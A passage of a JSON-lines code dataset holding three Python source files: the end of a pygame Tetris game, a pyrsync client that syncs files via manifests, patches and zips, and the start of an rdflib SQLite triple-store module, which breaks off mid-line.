score += 1200 * diff\r\n elif asd == 3:\r\n score += 300 * diff\r\n elif asd == 2:\r\n score += 100 * diff\r\n elif asd == 1:\r\n score += 40 * diff\r\n for counter in reversed(range(max(ds))):\r\n \r\n for j in range(len(grid[counter])):\r\n if grid[counter][j] == 1:\r\n print(j)\r\n if counter + 1 < 20: \r\n grid[counter][j] = 0\r\n grav = True\r\n nasd = 1\r\n \r\n while grav:\r\n if counter + nasd <= 19:\r\n if grid[counter + nasd][j] == 0:\r\n nasd += 1 \r\n \r\n else:\r\n gridcolor[counter + nasd - 1][j] = gridcolor[counter][j]\r\n gridcolor[counter][j] = 0\r\n\r\n grav = False\r\n else:\r\n grav = False\r\n \r\n \r\n \r\n asd = 0\r\ndef main():\r\n global lines, grid,gridcolor, score, diff\r\n lines = 0\r\n diff = 1\r\n grid = []\r\n gridcolor = []\r\n score = 0\r\n pygame.mixer.music.load(musicChoice)\r\n pygame.mixer.music.play(-1)\r\n # tetris record 79 950 # FIX BEING ABLE TO ROTATE OUT OF BOUNDS THANKS\r\n yeetDiff = 0\r\n \r\n run = True\r\n move = True\r\n downcounter = 0\r\n autodown = 0\r\n ######\r\n for x in range(20):\r\n row = []\r\n color = []\r\n for y in range(10): #I SNATCHED THIS BIT OF CODE FROM THE DEVIL(stackoverflow)\r\n row.append(0)\r\n color.append(0)\r\n grid.append(row)\r\n gridcolor.append(color)\r\n\r\n \r\n#######\r\n prevRn = random.randint(0,6)\r\n rn = random.randint(0,6)\r\n nextblock = DisplayBlock(blocks[rn],colors[rn])\r\n currentblock = TetrisBlock(blocks[prevRn], colors[prevRn])\r\n run = True\r\n forwhat = pygame.font.SysFont(None,20,True,True)\r\n while run:\r\n yeetDiff += 1\r\n if yeetDiff == 10000:\r\n diff += 1\r\n yeetDiff = 0\r\n levelimage = forwhat.render(\"Level\" + \" \" + str(diff), False,(255,0,0)) \r\n fontimage = forwhat.render(\"Lines\" + \" \" + str(lines), False, (255,0,0))\r\n scoreImage = forwhat.render(\"Score\" + \" \" + str(score), False, (255,0,0))\r\n autodown += 1\r\n if autodown >= 25 / diff:\r\n autodown = 0\r\n move = currentblock.GoDown()\r\n screen.fill((0,0,0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n pygame.quit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_d:\r\n currentblock.RotateRight()\r\n if event.key == pygame.K_a:\r\n currentblock.RotateLeft()\r\n if event.key == pygame.K_LEFT:\r\n currentblock.GoLeft()\r\n if event.key == pygame.K_RIGHT:\r\n currentblock.GoRight()\r\n if event.key == pygame.K_SPACE:\r\n move = currentblock.HardDrop()\r\n keys = pygame.key.get_pressed()\r\n downcounter += 1\r\n if keys[pygame.K_DOWN]:\r\n if downcounter >= 5:\r\n downcounter = 0\r\n move = currentblock.GoDown()\r\n if move == False:\r\n move = True\r\n currentblock.SetGrid()\r\n prevRn = rn\r\n currentblock = TetrisBlock(blocks[prevRn], colors[prevRn])\r\n rn = random.randint(0,6)\r\n nextblock = DisplayBlock(blocks[rn], colors[rn])\r\n CheckLines()\r\n if End(currentblock):\r\n run = False\r\n GameEnd()\r\n for counter in range(len(grid)): \r\n for j in range(len(grid[counter])):\r\n \r\n if grid[counter][j] == 1:\r\n screen.blit(gridcolor[counter][j], (j * pixels,counter * pixels))\r\n currentblock.Render()\r\n nextblock.Render()\r\n screen.blit(fontimage,(200, 50))\r\n screen.blit(scoreImage, (200,100))\r\n screen.blit(levelimage,(200,150))\r\n clock.tick(60)\r\n pygame.display.flip()\r\n pygame.mixer.music.stop() \r\ndef GameEnd():\r\n global musicChoice\r\n \r\n yeet = pygame.Surface((75,75))\r\n forwhat = pygame.font.SysFont(None,20,True,True)\r\n rect = pygame.Rect(100,200,75,75)\r\n asd = True\r\n r = 0\r\n g = 0\r\n b = 0 # 200 by 400\r\n i = 0\r\n fontimage = forwhat.render(\"Tetris\", False, (255,0,0))\r\n\r\n seinfeldSurface = pygame.Surface((75,75))\r\n seinfeldRect = pygame.Rect(0,0,75,75)\r\n seinfeldFont = forwhat.render(\"Seinfeld\", False, (255,0,0))\r\n regularSurface = pygame.Surface((75,75))\r\n regularRect = pygame.Rect(0,80,75,75)\r\n regularFont = forwhat.render(\"Regular\", False, (255,0,0))\r\n while asd: \r\n screen.fill((r,g,b))\r\n yeet.fill((r,b,g))\r\n seinfeldSurface.fill((g,r,b))\r\n regularSurface.fill((g,r,b))\r\n screen.blit(seinfeldSurface,(0,0))\r\n screen.blit(regularSurface,(0,80))\r\n screen.blit(yeet,(100,200))\r\n screen.blit(fontimage,(100,200))\r\n screen.blit(seinfeldFont,(0,0)) # r g b : r b g : b r g : b g r : g r b : g b r\r\n screen.blit(regularFont,(0,80))\r\n fontimage = forwhat.render(\"TETRIS\", False, (b,r,g))\r\n seinfeldFont = forwhat.render(\"Seinfeld\", False, (b,g,r))\r\n regularFont = forwhat.render(\"Regular\", False, (g,b,r))\r\n r = math.sin(0.5*i + 0) * 127 + 128;\r\n g = math.sin(0.5*i + 2) * 127 + 128;\r\n b = math.sin(0.5*i + 4) * 127 + 128;\r\n i += 0.1\r\n if i == 32:\r\n i = 0 \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n asd = False\r\n pygame.quit()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n x , y = pygame.mouse.get_pos()\r\n if rect.collidepoint(x,y):\r\n main()\r\n if seinfeldRect.collidepoint(x,y):\r\n \r\n musicChoice = \"Seinfeld.mp3\"\r\n if regularRect.collidepoint(x,y):\r\n musicChoice = \"Regular.mp3\"\r\n clock.tick(60)\r\n pygame.display.flip()\r\n\r\nGameEnd()\r\n","sub_path":"tetris/tetrisDone/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":18539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"565125176","text":"from sys import stderr\nfrom cStringIO import StringIO\nfrom gzip import open as gzopen, GzipFile\nfrom os import remove\nfrom os.path import isfile, join as pathjoin, exists as pathexists\nfrom zipfile import ZipFile\nfrom .manifest import manifest\nfrom .clientbase import rsyncbase\n\nclass rsclient(rsyncbase):\n def __init__(self, jsz, jloc, urlbase):\n rsyncbase.__init__(self, jsz, jloc, urlbase)\n self.manifest = jloc['manifest']\n self.jloc = jloc\n self.rflist = [] # the unproccessed rfpathes.\n\n def __call__(self):\n yield self.report.setTitle('cli.manifest')\n self.climfobj = manifest(self.jloc)\n if isfile(self.manifest):\n self.climfobj.load(gzopen(self.manifest, 'rb'))\n\n yield self.report.setTitle('srv.manifest')\n self.srvmfobj = manifest(self.jloc)\n bodyfobj = StringIO(self.urlget('manifest'))\n try:\n self.srvmfobj.load(GzipFile('srvmanifest', 'rb',\n fileobj = bodyfobj))\n except:\n bodyfobj.seek(0)\n raise Exception('Error: with response %s' % bodyfobj.read())\n\n self.report.setTitle('cli.traversal')\n genobj = self.cli_traversal()\n iterobj = genobj.next()\n while iterobj:\n yield iterobj\n iterobj = genobj.next()\n\n self.report.setTitle('srv.traversal')\n genobj = self.srv_traversal()\n iterobj = genobj.next()\n while iterobj:\n yield iterobj\n iterobj = genobj.next()\n\n if self.rflist:\n # remove all files which do not covered by any srvmfobj pacakge.\n yield self.report.setTitle('clean ')\n for rfpath in self.rflist: remove(pathjoin(self.rootdir, rfpath))\n yield self.report.incDels(len(self.rflist))\n\n self.report.setTitle('result')\n yield self.report.setStep(0, 0)\n yield None\n\n def cli_traversal(self):\n step = 0\n self.report.branch = None\n for chksum in self.climfobj.keys():\n yield self.report.setStep(step, len(self.climfobj))\n if chksum in self.srvmfobj:\n self.report.branch = 'match'\n # all files in the current packages are not changed.\n assert(self.climfobj[chksum].rflist ==\n self.srvmfobj[chksum].rflist)\n self.report.incKeeps(len(self.climfobj[chksum].rflist))\n del(self.srvmfobj[chksum])\n step = step + 1\n else:\n chksum0 = self.srvmfobj.find(chksum)\n if chksum0 is None:\n self.report.branch = 'discard'\n # orphan package in client, discard it.\n # remember the rflist, remove them if required.\n self.rflist.extend(self.climfobj[chksum].rflist)\n del(self.climfobj[chksum])\n else:\n self.report.branch = 'patch'\n # cached patch found, use it.\n patchbody = self.urlpost('patch', chksum)\n rflist = self.climfobj[chksum].rflist\n self.patchflist(patchbody, rflist)\n del(self.climfobj[chksum])\n self.climfobj[chksum0] = self.srvmfobj.pop(chksum0)\n self.climfobj[chksum0].clean_history()\n step = step + 1\n self.climfobj.save(gzopen(self.manifest, 'wb'))\n yield self.report.setStep(step, len(self.climfobj))\n self.report.branch = None\n yield None\n\n def srv_traversal(self):\n maxstep = len(self.srvmfobj)\n #self.srvmfobj.save(open('xxx.mf', 'wt'))\n self.report.branch = None\n for chksum in self.srvmfobj.keys():\n yield self.report.setStep(maxstep - len(self.srvmfobj), maxstep)\n rflist = self.srvmfobj[chksum].rflist\n self.signprepare()\n self.signobj.push_rflist(rflist)\n self.signobj.push_end()\n fpathes = self.signobj.fpathes\n if not self.signobj.fpathes: signbody = ''\n else:\n self.signobj.run(self.jsz.buf)\n signbody = self.signobj.sinkobj.get_string()\n self.signobj = None\n limit = self.jsz.signlimit * len(rflist) +\\\n sum(map(lambda rfpath: len(rfpath), rflist))\n if len(signbody) < limit:\n self.report.branch = 'zip'\n # new package or not worth to do cmps, use cached zip directly.\n # clean up firstly.\n rmcnt = 0\n for fpath in fpathes:\n if not pathexists(fpath): continue\n remove(fpath)\n rmcnt = rmcnt + 1\n self.report.incDels(rmcnt)\n zipbody = self.urlpost('zip', chksum)\n self.applyzip(zipbody)\n else:\n self.report.branch = 'cmp'\n # no cache, do signature, patch.\n patchbody = self.urlpost('cmp', signbody)\n self.patchflist(patchbody)\n self.climfobj[chksum] = self.srvmfobj.pop(chksum)\n self.climfobj.save(gzopen(self.manifest, 'wb'))\n assert(self.srvmfobj == {})\n yield self.report.setStep(maxstep, maxstep)\n self.report.branch = None\n yield None\n\n def applyzip(self, zipbody):\n zipfobj = StringIO(zipbody)\n zipobj = ZipFile(zipfobj, 'r')\n rflist = zipobj.namelist()\n zipobj.extractall(self.rootdir)\n self.rflist = filter(lambda rfpath: rfpath not in rflist, self.rflist)\n zipobj.close()\n zipfobj.close()\n self.report.incNews(len(rflist))\n return rflist\n","sub_path":"pyrsync/client0.py","file_name":"client0.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"140479656","text":"import os\nimport re\nimport sqlite3\nfrom functools import reduce\nfrom hashlib import sha1\n\nfrom rdflib import RDF, BNode, Literal, URIRef, Variable, logger\nfrom rdflib.events import Dispatcher\nfrom rdflib.graph import DATASET_DEFAULT_GRAPH_ID, Dataset, Graph, QuotedGraph\nfrom rdflib.plugins.stores.regexmatching import PYTHON_REGEX, REGEXTerm\nfrom rdflib.store import Store\n\n__all__ = [\"SQLiteStore\"]\n\n\nSUBJECT = 0\nPREDICATE = 1\nOBJECT = 2\nCONTEXT = 3\n\nTERM_COMBINATIONS = dict(\n [\n (term, cnt)\n for cnt, term in enumerate(\n \"\\\nUUUU,UUUB,UUUF,UUVU,UUVB,UUVF,UUBU,UUBB,UUBF,UULU,UUUL,UULB,UULF,\\\nUUFU,UUFB,UUFF,UVUU,UVUB,UVUF,UVVU,UVVB,UVVF,UVBU,UVBB,UVBF,UVLU,\\\nUVLB,UVLF,UVFU,UVFB,UVFF,VUUU,VUUB,VUUF,VUVU,VUVB,VUVF,VUBU,VUBB,\\\nVUBF,VULU,VULB,VULF,VUFU,VUFB,VUFF,VVUU,VVUB,VVUF,VVVU,VVVB,VVVF,\\\nVVBU,VVBB,VVBF,VVLU,VVLB,VVLF,VVFU,VVFB,VVFF,BUUU,BUUB,BUUF,BUVU,\\\nBUVB,BUVF,BUBU,BUBB,BUBF,BULU,BULB,BULF,BUFU,BUFB,BUFF,BVUU,BVUB,\\\nBVUF,BVVU,BVVB,BVVF,BVBU,BVBB,BVBF,BVLU,BVLB,BVLF,BVFU,BVFB,BVFF,\\\nFUUU,FUUB,FUUF,FUVU,FUVB,FUVF,FUBU,FUBB,FUBF,FULU,FULB,FULF,FUFU,\\\nFUFB,FUFF,FVUU,FVUB,FVUF,FVVU,FVVB,FVVF,FVBU,FVBB,FVBF,FVLU,FVLB,\\\nFVLF,FVFU,FVFB,FVFF\".split(\n \",\"\n )\n )\n ]\n)\n\nREVERSE_TERM_COMBINATIONS = dict(\n [(value, key) for key, value in list(TERM_COMBINATIONS.items())]\n)\n\n\nCOUNT_SELECT = 0\nCONTEXT_SELECT = 1\nTRIPLE_SELECT = 2\nTRIPLE_SELECT_NO_ORDER = 3\n\nASSERTED_NON_TYPE_PARTITION = 3\nASSERTED_TYPE_PARTITION = 4\nQUOTED_PARTITION = 5\nASSERTED_LITERAL_PARTITION = 6\n\nFULL_TRIPLE_PARTITIONS = [QUOTED_PARTITION, ASSERTED_LITERAL_PARTITION]\n\nINTERNED_PREFIX = \"kb_\"\n\nTERM_INSTANTIATION_DICT = {\"U\": URIRef, \"B\": BNode, \"V\": Variable, \"L\": Literal}\n\nGRAPH_TERM_DICT = {\n \"F\": (QuotedGraph, URIRef),\n \"U\": (Graph, URIRef),\n \"B\": (Graph, BNode),\n}\n\n\n# Takes an instance of a Graph (Graph, QuotedGraph, Dataset, or BackwardCompatGraph)\n# and returns the Graphs identifier and 'type' ('U' for Graphs, 'F' for QuotedGraphs ).\ndef normalize_graph(graph):\n if isinstance(graph, QuotedGraph):\n return graph.identifier, \"F\"\n else:\n if isinstance(graph, (Graph, Dataset)):\n return graph.identifier, term_to_letter(graph.identifier)\n else:\n return graph, term_to_letter(graph)\n\n\ndef term_to_letter(term):\n if isinstance(term, URIRef):\n return \"U\"\n elif isinstance(term, BNode):\n return \"B\"\n elif isinstance(term, Literal):\n return \"L\"\n elif isinstance(term, QuotedGraph):\n return \"F\"\n elif isinstance(term, Variable):\n return \"V\"\n elif isinstance(term, Graph):\n return term_to_letter(term.identifier)\n elif term is None:\n return \"L\"\n else:\n raise Exception(\n f\"The given term ({term}, a {type(term)}) is not an \"\n \"instance of any of the known types (BNode, Literal, \"\n \"QuotedGraph, URIRef or Variable).\"\n )\n\n\ndef construct_graph(term):\n return GRAPH_TERM_DICT[term]\n\n\ndef type_to_termcombination(member, klass, context):\n try:\n rt = TERM_COMBINATIONS[\n \"%sU%s%s\"\n % (\n term_to_letter(member),\n term_to_letter(klass),\n normalize_graph(context)[-1],\n )\n ]\n return rt\n except Exception:\n raise Exception(\n \"Unable to persist classification triple: %s %s %s %s\"\n % (member, \"rdf:type\", klass, context)\n )\n\n\ndef statement_to_termcombination(subj, pred, obj, context):\n return TERM_COMBINATIONS[\n \"%s%s%s%s\"\n % (\n term_to_letter(subj),\n term_to_letter(pred),\n term_to_letter(obj),\n normalize_graph(context)[-1],\n )\n ]\n\n\ndef create_sha_digest(value):\n return sha1(value.encode(\"utf-8\") if isinstance(value, str) else value).hexdigest()\n\n\n# Helper function for executing EXPLAIN on all dispatched SQL statements - for the pupose of analyzing\n# index usage addr opcode p1 p2 p3 p4 p5 comment\n# def query_analysis(query, store, cursor):\n# cursor.execute(store._normalize_sql_command(\"explain \" + query))\n# rt = cursor.fetchall()[0]\n# (\n# table,\n# jointype,\n# poskeys,\n# _key,\n# key_len,\n# comparedcol,\n# rowsexamined,\n# extra,\n# ) = rt\n# assert rt == \"\"\n# if not _key:\n# assert jointype == \"ALL\"\n# if not hasattr(store, \"queryOptMarks\"):\n# store.queryOptMarks = {}\n# hits = store.queryOptMarks.get((\"FULL SCAN\", table), 0)\n# store.queryOptMarks[(\"FULL SCAN\", table)] = hits + 1\n\n# if not hasattr(store, \"queryOptMarks\"):\n# store.queryOptMarks = {}\n# hits = store.queryOptMarks.get((_key, table), 0)\n# store.queryOptMarks[(_key, table)] = hits + 1\n\n\n# Terms: u - uri refs v - variables b - bnodes l - literal f - formula\n\n# Helper function for building union all select statement\n# Takes a list of:\n# - table name\n# - table alias\n# - table type (literal, type, asserted, quoted)\n# - where clause string\ndef union_select(selectcomponents, distinct=False, selecttype=TRIPLE_SELECT):\n selects = []\n\n for (\n table_name,\n tablealias,\n whereclause,\n tabletype,\n ) in selectcomponents:\n\n if selecttype == COUNT_SELECT:\n select_string = \"select count(*)\"\n tablesource = f\" from {table_name} \"\n\n elif selecttype == CONTEXT_SELECT:\n select_string = f\"select {tablealias}.context\"\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype in FULL_TRIPLE_PARTITIONS:\n select_string = \"select *\" # %(tablealias)\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype == ASSERTED_TYPE_PARTITION:\n\n select_string = (\n f\"SELECT {tablealias}.member AS subject, \"\n f'\"{RDF.type}\" AS predicate, '\n f\"{tablealias}.klass AS object, \"\n f\"{tablealias}.context AS context, \"\n f\"{tablealias}.termComb AS termComb, \"\n \"NULL AS objLanguage, \"\n \"NULL AS objDatatype\"\n )\n\n tablesource = f\" from {table_name} as {tablealias} \"\n\n elif tabletype == ASSERTED_NON_TYPE_PARTITION:\n select_string = \"\"\"SELECT *, NULL as objLanguage, NULL as objDatatype\"\"\"\n tablesource = f\" from {table_name} as {tablealias} \"\n\n whereclause = \"\" if whereclause is None else whereclause\n\n if isinstance(whereclause, tuple):\n\n whereclause = whereclause[0].replace(\"%s\", '\"{}\"').format(*whereclause[1])\n\n selects.append(select_string + tablesource + whereclause)\n\n orderstatement = \"\"\n\n if selecttype == TRIPLE_SELECT:\n orderstatement = \" ORDER BY subject, predicate, object\"\n\n if distinct:\n return \" UNION \".join(selects) + orderstatement\n else:\n return \" UNION ALL \".join(selects) + orderstatement\n\n\n# Takes a tuple which represents an entry in a result set and\n# converts it to a tuple of terms using the termComb integer\n# to interpret how to instanciate each term\ndef extract_triple(tuplert, store, hardcoded_context=None):\n (\n subject,\n predicate,\n obj,\n rt_context,\n term_comb,\n object_language,\n object_datatype,\n ) = tuplert\n context = rt_context is not None and rt_context or hardcoded_context.identifier\n subjterm, predterm, objterm, ctxterm = REVERSE_TERM_COMBINATIONS[term_comb]\n\n object_language = (\n None\n if object_language is not None and \"NULL\" in object_language\n else object_language\n )\n object_datatype = (\n None\n if object_datatype is not None and \"NULL\" in object_datatype\n else object_datatype\n )\n\n s = create_term(subject, subjterm, store)\n p = create_term(predicate, predterm, store)\n o = create_term(obj, objterm, store, object_language, object_datatype)\n\n graph_class, id_cllass = construct_graph(ctxterm)\n return s, p, o, (graph_class, id_cllass, context)\n\n\n# TODO: Stuff\n# Takes a term value, term type, and store intance and creates a term object.\n# QuotedGraphs are instantiated differently\n\n\ndef create_term(\n term_string, term_type, store, object_language=None, object_datatype=None\n):\n if term_type == \"L\":\n cache = store.literalCache.get((term_string, object_language, object_datatype))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = Literal(term_string, object_language, object_datatype)\n store.literalCache[((term_string, object_language, object_datatype))] = rt\n return rt\n elif term_type == \"F\":\n cache = store.otherCache.get((term_type, term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = QuotedGraph(store, URIRef(term_string))\n store.otherCache[(term_type, term_string)] = rt\n return rt\n elif term_type == \"B\":\n cache = store.bnodeCache.get((term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = TERM_INSTANTIATION_DICT[term_type](term_string)\n store.bnodeCache[(term_string)] = rt\n return rt\n elif term_type == \"U\":\n cache = store.uriCache.get((term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = URIRef(term_string)\n store.uriCache[(term_string)] = rt\n return rt\n else:\n cache = store.otherCache.get((term_type, term_string))\n if cache is not None:\n # store.cache_hits += 1\n return cache\n else:\n # store.cache_misses += 1\n rt = TERM_INSTANTIATION_DICT[term_type](term_string)\n store.otherCache[(term_type, term_string)] = rt\n return rt\n\n\nclass SQLGenerator:\n def execute_sql(self, cursor, querystr, params=None, param_list=False):\n \"\"\"\n This takes the query string and parameters and (depending on the SQL\n implementation) either fill in the parameter in-place or pass it on\n to the Python DB impl (if it supports this). The default (here) is to\n fill the parameters in-place surrounding each param with quote\n characters\n \"\"\"\n querystr = querystr.decode() if isinstance(querystr, bytes) else querystr\n\n if not params:\n cursor.execute(str(querystr))\n elif param_list:\n # raise Exception(f\"Not supported! {querystr} {params}\")\n for p in params:\n cursor.execute(querystr, p)\n else:\n querystr = (\n querystr.decode(\"utf-8\") if isinstance(querystr, bytes) else querystr\n )\n if \"VALUES (?\" in querystr:\n cursor.execute(querystr, params)\n else:\n params = tuple(\n [\n not isinstance(item, int) and '\"%s\"' % item or item\n for item in params\n ]\n )\n executionstr = querystr % params\n cursor.execute(executionstr)\n\n def escape_quotes(self, node_string):\n \"\"\"Properly escape strings for n-triples and n-quads serialization.\"\"\"\n if node_string is None:\n return \"\"\n output_string = \"\"\n for char in node_string:\n if char == \"\\u0009\":\n output_string += \"\\\\t\"\n elif char == \"\\u000A\":\n output_string += \"\\\\n\"\n elif char == \"\\u000D\":\n output_string += \"\\\\r\"\n elif char == \"\\u0022\":\n output_string += '\\\\\"'\n elif char == \"\\u005C\":\n output_string += \"\\\\\\\\\"\n elif (\n char >= \"\\u0020\"\n and char <= \"\\u0021\"\n or char >= \"\\u0023\"\n and char <= \"\\u005B\"\n or char >= \"\\u005D\"\n and char <= \"\\u007E\"\n ):\n output_string += char\n elif char >= \"\\u007F\" and char <= \"\\uFFFF\":\n output_string += \"\\\\u%04X\" % ord(char)\n elif char >= \"\\U00010000\" and char <= \"\\U0010FFFF\":\n output_string += \"\\\\U%08X\" % ord(char)\n return output_string\n\n # Normalize a SQL command before executing it. Commence unicode black\n # magic\n def _normalize_sql_command(self, cmd):\n\n if not isinstance(cmd, str):\n cmd = str(cmd, \"ascii\")\n return cmd\n\n # Takes a term and 'normalizes' it. Literals are escaped, Graphs are\n # replaced with just their identifiers\n def normalize_term(self, term):\n if isinstance(term, Graph):\n return term.identifier\n # TODO: FIXME: Should Literals be escaped here?\n\n # elif isinstance(term, Literal):\n # return self.escape_quotes(term)\n\n elif term is None or isinstance(term, (list, REGEXTerm)):\n return term\n else:\n return term\n\n # Builds an insert command for a type table\n def build_insert_type_statement_sql_command(self, member, klass, context, store_id):\n # columns: member, klass, context\n rt = f\"INSERT INTO {store_id}_type_statements VALUES (?, ?, ?, ?)\"\n return rt, [\n self.normalize_term(member),\n self.normalize_term(klass),\n self.normalize_term(context),\n int(type_to_termcombination(member, klass, context)),\n ]\n\n # Builds an insert command for literal triples (statements where the object is a Literal)\n def build_insert_literal_triple_sql_command(\n self, subject, predicate, obj, context, store_id\n ):\n\n triple_pattern = int(\n statement_to_termcombination(subject, predicate, obj, context)\n )\n command = (\n f\"INSERT INTO {store_id}_literal_statements VALUES (?, ?, ?, ?, ?, ?, ?)\"\n )\n return command, [\n self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(\n context.identifier if isinstance(context, Graph) else context\n ),\n triple_pattern,\n isinstance(obj, Literal) and obj.language or \"NULL\",\n isinstance(obj, Literal) and obj.datatype or \"NULL\",\n ]\n\n # Builds an insert command for regular triple table\n def build_insert_triple_sql_command(\n self, subject, predicate, obj, context, store_id, quoted\n ):\n stmt_table = (\n f\"{store_id}_quoted_statements\"\n if quoted\n else f\"{store_id}_asserted_statements\"\n )\n\n triple_pattern = statement_to_termcombination(subject, predicate, obj, context)\n\n if quoted:\n command = f\"INSERT INTO {stmt_table} VALUES (?, ?, ?, ?, ?, ?, ?)\"\n params = [\n self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(context),\n triple_pattern,\n isinstance(obj, Literal) and obj.language or \"NULL\",\n isinstance(obj, Literal) and obj.datatype or \"NULL\",\n ]\n else:\n command = f\"INSERT INTO {stmt_table} VALUES (?, ?, ?, ?, ?)\"\n params = [\n self.normalize_term(subject),\n self.normalize_term(predicate),\n self.normalize_term(obj),\n self.normalize_term(context),\n triple_pattern,\n ]\n return command, params\n\n # Builds WHERE clauses for the supplied terms and, context\n def build_where_clause(\n self,\n table_name,\n subject,\n predicate,\n obj,\n context=None,\n typetable=False,\n ):\n parameters = []\n\n if typetable:\n rdf_type_member_clause = None\n rdf_type_context_clause = None\n rdf_type_klass_clause = None\n\n clause_parts = self.build_type_member_clause(\n self.normalize_term(subject), table_name\n )\n if clause_parts is not None:\n rdf_type_member_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_type_class_clause(\n self.normalize_term(obj), table_name\n )\n if clause_parts is not None:\n rdf_type_klass_clause = clause_parts[0]\n parameters.extend(clause_parts[-1])\n\n clause_parts = self.build_context_clause(context, table_name)\n if clause_parts is not None:\n rdf_type_context_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n type_clauses = [\n rdf_type_member_clause,\n rdf_type_klass_clause,\n rdf_type_context_clause,\n ]\n clause_string = \" and \".join([clause for clause in type_clauses if clause])\n clause_string = clause_string and \"where \" + clause_string or \"\"\n else:\n subject_clause = (\n predicate_clause\n ) = (\n object_clause\n ) = (\n context_clause\n ) = literal_datatype_clause = literal_language_clause = None\n\n clause_parts = self.build_subject_clause(\n self.normalize_term(subject), table_name\n )\n if clause_parts is not None:\n subject_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_predicate_clause(\n self.normalize_term(predicate), table_name\n )\n if clause_parts is not None:\n predicate_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_object_clause(\n self.normalize_term(obj), table_name\n )\n if clause_parts is not None:\n object_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_context_clause(context, table_name)\n if clause_parts is not None:\n context_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_literal_datatype_clause(obj, table_name)\n if clause_parts is not None:\n literal_datatype_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clause_parts = self.build_literal_language_clause(obj, table_name)\n if clause_parts is not None:\n literal_language_clause = clause_parts[0]\n parameters.extend([param for param in clause_parts[-1] if param])\n\n clauses = [\n subject_clause,\n predicate_clause,\n object_clause,\n context_clause,\n literal_datatype_clause,\n literal_language_clause,\n ]\n\n clause_string = \" and \".join([clause for clause in clauses if clause])\n clause_string = clause_string and \"where \" + clause_string or \"\"\n\n return clause_string, [p for p in parameters if p]\n\n def build_literal_datatype_clause(self, obj, table_name):\n if isinstance(obj, Literal):\n return (\n obj.datatype is not None\n and (f\"{table_name}.objDatatype=%s\", {obj.datatype})\n or None\n )\n else:\n return None\n\n def build_literal_language_clause(self, obj, table_name):\n if isinstance(obj, Literal):\n return (\n obj.language is not None\n # and (f\"{table_name}.objLanguage={obj.language.encode('utf-8')}\",)\n and (f\"{table_name}.objLanguage=%s\", {obj.language})\n or None\n )\n else:\n return None\n\n # Stubs for Clause Functions that are overridden by specific implementations (MySQL vs SQLite for instance)\n def build_subject_clause(self, subject, tablename):\n pass # pragma: no cover\n\n def build_predicate_clause(self, predicate, tablename):\n pass # pragma: no cover\n\n def build_object_clause(self, obj, tablename):\n pass # pragma: no cover\n\n def build_context_clause(self, context, tablename):\n pass # pragma: no cover\n\n def build_type_member_clause(self, subject, tablename):\n pass # pragma: no cover\n\n def build_type_class_clause(self, obj, tablename):\n pass # pragma: no cover\n\n\nclass AbstractSQLStore(SQLGenerator, Store):\n \"\"\"\n SQL-92 formula-aware implementation of an rdflib Store.\n It stores its triples in the following partitions:\n\n - Asserted non-rdf:type statements\n - Asserted literal statements\n - Asserted rdf:type statements (in a table which models Class membership)\n The motivation for this partition is primarily query speed and\n scalability as most graphs will always have more rdf:type statements\n than others\n - All Quoted statements\n\n In addition it persists namespace mappings in a seperate table\n \"\"\"\n\n context_aware = True\n graph_aware = True\n formula_aware = True\n transaction_aware = True\n regex_matching = PYTHON_REGEX\n autocommit_default = True\n\n # Stubs for overidden\n\n def __init__(self, identifier=None, configuration=None):\n \"\"\"\n identifier: URIRef of the Store. Defaults to CWD\n configuration: string containing infomation open can use to\n connect to datastore.\n \"\"\"\n self.identifier = identifier and identifier or BNode(\"hardcoded\")\n # Use only the first 10 bytes of the digest\n self._interned_id = INTERNED_PREFIX + create_sha_digest(self.identifier)[:10]\n\n # This parameter controls how exlusively the literal table is searched\n # If true, the Literal partition is searched *exclusively* if the object term\n # in a triple pattern is a Literal or a REGEXTerm. Note, the latter case\n # prevents the matching of URIRef nodes as the objects of a triple in the store.\n # If the object term is a wildcard (None)\n # Then the Literal paritition is searched in addition to the others\n # If this parameter is false, the literal partition is searched regardless of what the object\n # of the triple pattern is\n self.STRONGLY_TYPED_TERMS = False\n\n if configuration is not None:\n try:\n self.open(configuration)\n except Exception as e: # pragma: no cover\n raise Exception(f\"{e} unable to open {configuration}\")\n\n self.cache_hits = 0\n self.cache_misses = 0\n\n self.literalCache = {}\n self.uriCache = {}\n self.bnodeCache = {}\n self.otherCache = {}\n self._db = None\n self.dispatcher = Dispatcher()\n\n def close(self, commit_pending_transaction=False):\n if commit_pending_transaction:\n self._db.commit()\n self._db.close()\n\n # Triple Methods\n def add(self, triple, context=None, quoted=False):\n \"\"\"Add a triple to the store of triples.\"\"\"\n (subject, predicate, obj) = triple\n context = DATASET_DEFAULT_GRAPH_ID if context is None else context\n # Pending Dataset re-work\n # assert not isinstance(context, Graph)\n if isinstance(context, 